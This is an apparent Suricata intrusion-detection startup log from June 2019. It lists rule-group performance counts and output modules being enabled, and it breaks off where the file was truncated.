28/6/2019 -- 02:55:13 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
28/6/2019 -- 02:55:13 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
28/6/2019 -- 02:55:13 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
28/6/2019 -- 02:55:13 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
28/6/2019 -- 02:55:13 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
28/6/2019 -- 02:55:13 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
28/6/2019 -- 02:55:14 - <Perf> - Unique rule groups: 111
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver TCP packet": 31
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient TCP packet": 20
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver TCP stream": 31
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient TCP stream": 21
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver UDP packet": 33
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient UDP packet": 15
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "other IP packet": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_uri": 8
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_request_line": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_client_body": 6
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_response_line": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_header": 6
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_header": 3
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_header_names": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_accept": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_referer": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_content_len": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_content_type": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_content_type": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_start": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_method": 3
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_cookie": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_cookie": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_host": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver dns_query": 4
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver tls_sni": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver file_data": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient file_data": 5
28/6/2019 -- 02:55:15 - <Perf> - Registered 18241 rule profiling counters.
28/6/2019 -- 02:55:15 - <Info> - fast output device (regular) initialized: alert
28/6/2019 -- 02:55:15 - <Info> - eve-log output device (regular) initialized: eve.json
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'alert'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'http'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'dns'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'tls'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'files'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'ssh'
28/6/2019 -- 02:55:15 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
28/6/2019 -- 02:55:15 - <Info> - stats 

This file has been truncated. Go here to download in full.